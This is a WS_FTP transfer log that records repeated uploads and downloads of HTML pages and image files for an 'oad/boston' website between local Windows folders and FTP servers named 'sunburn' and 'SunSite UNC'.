10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
